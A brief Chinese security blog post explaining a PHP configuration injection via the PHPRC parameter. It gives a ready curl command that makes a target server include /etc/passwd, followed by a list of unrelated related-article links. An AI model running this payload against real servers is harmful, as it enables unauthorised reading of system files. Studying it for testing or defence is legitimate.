【网络安全】PHP配置注入漏洞

未经许可,不得转载。

文章目录

正文

前提:通过探测等方式发现某个 PHP 文件存在 PHPRC 参数:

bash 复制代码
curl "https://xxx.com/about.php?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"'

PHPRC 用于指定 PHP 配置文件(php.ini)的路径。通过将其设置为 /dev/fd/0,我们尝试让服务器从标准输入读取 PHP 配置。

--data-binary 参数以二进制格式发送数据,适合传递原始数据而非标准表单参数。

auto_prepend_file 是 PHP 配置选项,可以在执行脚本前自动包含指定文件。这里我们设置为 /etc/passwd,试图读取系统敏感信息。

漏洞证明如下:

相关推荐
优橙教育11 小时前
零基础学AI应用开发要多久?3个月能到什么水平
服务器·开发语言·网络·php
郭萌69615 小时前
多商户平台的优惠券,真正的设计对象是「适用范围」而不是券模板
php
额额额对了15 小时前
嵌入式 Linux 启动程序文件
开发语言·嵌入式硬件·php
v:ychya201816 小时前
独立站外贸建站公司怎么选?建站就要建营销型网站
前端·php
梅菲塔亚17 小时前
华为云从入门到实战
开发语言·华为云·php
要吃这碗饭17 小时前
AI 智能体如何通过 auth.md 注册 Bright Data 账号
数据库·人工智能·php
霸道流氓气质17 小时前
幂等性与 Upsert:防止重复操作产生副作用的技术
开发语言·php
qq_5434478218 小时前
DNS解析怎么排查?故障处理与运维实用手册
运维·服务器·网络·php
Hum8le19 小时前
CTF题目《easy_web》(安洵杯 2019 变种 Web)
前端·安全·web安全
ZHOUPUYU19 小时前
PHP 9.0 前瞻:下一代 PHP 会带来哪些新功能?
android·开发语言·php